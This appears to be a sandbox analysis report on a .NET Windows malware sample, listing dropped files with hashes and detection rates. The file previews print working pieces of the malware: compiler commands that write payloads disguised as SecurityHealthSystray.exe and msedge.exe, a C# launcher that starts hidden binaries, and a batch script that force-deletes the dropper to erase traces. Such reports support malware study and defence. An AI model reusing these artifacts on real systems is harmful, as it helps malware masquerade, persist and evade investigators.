                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.0.cs"
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (327), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):748
                                                    Entropy (8bit):5.251450145012145
                                                    Encrypted:false
                                                    SSDEEP:12:Ky/I/u7L//TRq79cQjZhStKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KYI/un/Vq79t9aKax5DqBVKVrdFAMBJj
                                                    MD5:B0DE2746A69CD866DB1EF4789ED29EB1
                                                    SHA1:008FC96FEB35C23E1B45B2654DA3E128DAEBB3ED
                                                    SHA-256:BA78FA50ED918F94469C84B7A4991F4BCFC2262FB272A7F680EFF7E896B0EED8
                                                    SHA-512:A38918A2745210AD382534C74DBDD668A9089BA24CD749535FE16AFEEAE00B25B63B920E3ED24515A898CB4F15DB1E6D19567723F3E08ECFAB9B5FE35AB705DD
                                                    Malicious:false
                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):406
                                                    Entropy (8bit):4.98831312720577
                                                    Encrypted:false
                                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LuriFkD:JNVQIbSfhWLzIiFkMSfhWLumFkD
                                                    MD5:127E081305B5557B461A5ABD453CBC45
                                                    SHA1:252934F3031FDBDB598A08EA6FDA6647D1C6549C
                                                    SHA-256:EED7888AEFD2B8B15805860ED65F868D0340F4DDF7C5B422DC302253D81395FF
                                                    SHA-512:189ACC3E6EF81E98DC80C0640EF6ECA3DD692A1DC47AE414FCA0199F8A8C1A6461632EB10F8906C393DB86BCEAF0325B1AEAB6AE8DFF51ABA874D6D5E81798AD
                                                    Malicious:false
                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\java\jre-1.8\upfc.exe"); } catch { } }).Start();. }.}.
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):264
                                                    Entropy (8bit):5.189559592032363
                                                    Encrypted:false
                                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oFi23f7N:Hu7L//TRRzscQjZp
                                                    MD5:5592B8161E80E517A30EB9C6A2246020
                                                    SHA1:E9906A66D3B28B1781C33C805D35120F7D1100FF
                                                    SHA-256:481060751A51201CEFBEEB3FB7F91C3F4A72C4D18728F54E5C0A40D86264A184
                                                    SHA-512:CE5B651716AFF719922FB737ADEA8BFFC2E78F0DCA78CA638439259E5D510A1843CAD457C0DC541AF13E822FA87CD710DA002B1984C7648E44551C08319250E8
                                                    Malicious:true
                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.0.cs"
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (342), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):763
                                                    Entropy (8bit):5.266347304276392
                                                    Encrypted:false
                                                    SSDEEP:12:Ky/I/u7L//TRRzscQjZsKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KYI/un/VRzst9sKax5DqBVKVrdFAMBJj
                                                    MD5:7592B67A8F4D0E51C6779955225BD3F7
                                                    SHA1:62001AE0D2B19D39671A7CF0E9268638D7A658BD
                                                    SHA-256:72C6235E9AB864FECB36CBF01DF06DF6C7D61F47F008F22E25BA331B20709877
                                                    SHA-512:56881957873BA66A0A8077C23D7E375BB7AAFDD537DD0C65926E17765D24A867DFCBD0A0BC2615CB900DD1D93AF9D400B277BDFB38F6F35395423CBD7318C307
                                                    Malicious:false
                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1211596417522893
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                    MD5:0AB67F0950F46216D5590A6A41A267C7
                                                    SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                    SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                    SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                    Malicious:false
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):290
                                                    Entropy (8bit):5.252131870880147
                                                    Encrypted:false
                                                    SSDEEP:6:hCijTg3Nou1ShCZGR5usKOZGR5sHG2OZG1Fi23f4jpHEh:HTg9uDuv2ZH
                                                    MD5:57A1892F3CFC550F82C9A1843F4C4A16
                                                    SHA1:C398FCFEC76CCF34878B1327FB9B692C11E0ABB4
                                                    SHA-256:8A5CB274EFF4ACA287BD06C0A28C34DF6CB3E2AC1D870EC1888798F472EBCC18
                                                    SHA-512:A40A80B62BDD7AB0D5B13E58DDA6E0EA1ABBA0189D4915BBE5B2FB111E5EB5874AB3E1E8DADF9CFC8F994C3FD20B2E5A23E5DCD4FD7F0922C351EC2E5F133950
                                                    Malicious:false
                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..del /a /q /f "C:\Program Files (x86)\java\jre-1.8\upfc.exe"..del /a /q /f "C:\Program Files (x86)\java\jre-1.8\ea1d8f6d871115"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\tfVhKC50lX.bat"
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1211596417522893
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                    MD5:0AB67F0950F46216D5590A6A41A267C7
                                                    SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                    SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                    SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                    Malicious:false
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.6732424250451717
                                                    Encrypted:false
                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                    Malicious:false
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):23552
                                                    Entropy (8bit):5.519109060441589
                                                    Encrypted:false
                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Joe Sandbox View:
                                                    • Filename: Vg46FzGtNo.exe, Detection: malicious, Browse
                                                    • Filename: 6Z4Q4bREii.exe, Detection: malicious, Browse
                                                    • Filename: BbaXbvOA7D.exe, Detection: malicious, Browse
                                                    • Filename: cL7A9wGE3w.exe, Detection: malicious, Browse
                                                    • Filename: j05KsN2280.exe, Detection: malicious, Browse
                                                    • Filename: 2lR1Spui9w.exe, Detection: malicious, Browse
                                                    • Filename: b8khu7cOny.exe, Detection: malicious, Browse
                                                    • Filename: hnCn8gE6NH.exe, Detection: malicious, Browse
                                                    • Filename: l4R8w1Q8lC.exe, Detection: malicious, Browse
                                                    • Filename: yF4L47gYLd.exe, Detection: malicious, Browse
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):32256
                                                    Entropy (8bit):5.631194486392901
                                                    Encrypted:false
                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):85504
                                                    Entropy (8bit):5.8769270258874755
                                                    Encrypted:false
                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):32256
                                                    Entropy (8bit):5.631194486392901
                                                    Encrypted:false
                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with very long lines (652), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):652
                                                    Entropy (8bit):5.866145229900589
                                                    Encrypted:false
                                                    SSDEEP:12:yQBPpBWTMGckTQQHy5AYnVHBtGmW/0QYT1xJ5Fp9U5gK1TrezR0:yQNS6kTkTVHBtLW8DjXFp6l1TKR0
                                                    MD5:1B11DF9C72C40FD49F82A05D1002AD87
                                                    SHA1:590722226D520034A8FC0115D930D6D9A5E758F9
                                                    SHA-256:BEB50F81A4CECB61869AF5A72BE431C5E991B93DCA8F73CDD263D7A419743B70
                                                    SHA-512:2C574AFCC21159DD10BE8DBDF3D6D090C9D7C67BCBF7EB9386444B41F12A99473107EC06522CA6ABDABDA67113B70C4EA49C1C6F676E0E08B02E7B8CABE3229B
                                                    Malicious:false
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):85504
                                                    Entropy (8bit):5.8769270258874755
                                                    Encrypted:false
                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):23552
                                                    Entropy (8bit):5.519109060441589
                                                    Encrypted:false
                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with very long lines (415), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):415
                                                    Entropy (8bit):5.8325624456582155
                                                    Encrypted:false
                                                    SSDEEP:12:3C/5kndndfhlk06ivQySP1aRTsZXdAYeZRIJ:XndndA06QQyqSQFevY
                                                    MD5:65D0F4B9D7197D520D51E71C163593F6
                                                    SHA1:9DFE10EFC3ECEA18C016374B2FBD11079AD43EAA
                                                    SHA-256:E2927C9DB71F744188D22E826363A733B94116677BC7DAE477247729A31D36E6
                                                    SHA-512:42C62E352A693FB08C5E471F4D70B934E8F15CA359D54344DC37085A2E078E339A091A5CC0C34B7F765114CEDB608F2EF4111C304BBE659A772BA6C1E338C617
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1912832
                                                    Entropy (8bit):7.536317571621779
                                                    Encrypted:false
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    MD5:6667F954763EEACF7EFFCF5A5C25E695
                                                    SHA1:6DB1FBA1CD1181B921CDADEBA24C69CD680BE825
                                                    SHA-256:62B1BF60394248D2C743EC6DF0935D58E5009C9E04AAB52DA72AD712A57597B4
                                                    SHA-512:9CC3525D7B7926CAA3017FFC91E3262429C74A03C9BE10037D1BF416EE7DE812D60E2B1AFD87DFE1D5B2ECE3A21CFC4CACD4E79F0152AECC3E421F1996599D20
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):1224
                                                    Entropy (8bit):4.435108676655666
                                                    Encrypted:false
                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                    Malicious:false
                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4608
                                                    Entropy (8bit):3.9527336926822474
                                                    Encrypted:false
                                                    SSDEEP:48:6QpHPtVM7Jt8Bs3FJsdcV4MKe27BdxvqBHaOulajfqXSfbNtm:3PMPc+Vx9M1vkEcjRzNt
                                                    MD5:9DC83209265291CA0D61FF47F91EF4B8
                                                    SHA1:98C31EC5FEDAF9C7FB950BBF7A003E41AADF639C
                                                    SHA-256:BC8003D2321DC53E628892D127245BB55B97F86DA1AB5202F0A712F9C574C5B2
                                                    SHA-512:5AF55DD0393628677C2F124C7759B4AE06C231B802CAC42ABF4DC2D06239179DF7383963DE9472380C6EE6A2FFA4370E4793CDD5E4392C1D1CEB168360ED643A
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q.f.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                    Process:C:\Windows\System32\w32tm.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):151
                                                    Entropy (8bit):4.758454230181024
                                                    Encrypted:false
                                                    SSDEEP:3:VLV993J+miJWEoJ8FXxX9RVDUmy6voGK8XKNvj:Vx993DEU2tRVDvGGk
                                                    MD5:65D28B404CF428B414F45E120C517360
                                                    SHA1:7CCE7561153827DD1C98B2F865C3410057A23D54
                                                    SHA-256:CCF0373F9B6D58CA9DB3D1AF833149E3A6BF149FA699F8F03EC8FF2E24B2E9DE
                                                    SHA-512:8DC88521A3D772D42843095EFEC4ED017A48933342CDC83D38D5CB59050C463A6F6EF7AF329E1C6949D4B46DF010BA941D8AA5A68754F56B24351AD6587F1D59
                                                    Malicious:false
                                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 03/07/2024 11:44:11..11:44:11, error: 0x80072746.11:44:16, error: 0x80072746.
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.536317571621779
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File size:1'912'832 bytes
                                                    MD5:6667f954763eeacf7effcf5a5c25e695
                                                    SHA1:6db1fba1cd1181b921cdadeba24c69cd680be825
                                                    SHA256:62b1bf60394248d2c743ec6df0935d58e5009c9e04aab52da72ad712a57597b4
                                                    SHA512:9cc3525d7b7926caa3017ffc91e3262429c74a03c9be10037d1bf416ee7de812d60e2b1afd87dfe1d5b2ece3a21cfc4cacd4e79f0152aecc3e421f1996599d20
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    TLSH:CD959D1659924E3BC3641B314497003D92D0CB376A66FF0F3A1F61E5AE43BB5CA721BA
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q}f.................(...........F... ...`....@.. ....................................@................................
                                                    Icon Hash:90cececece8e8eb0
                                                    Entrypoint:0x5d46fe
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x667D5113 [Thu Jun 27 11:46:27 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
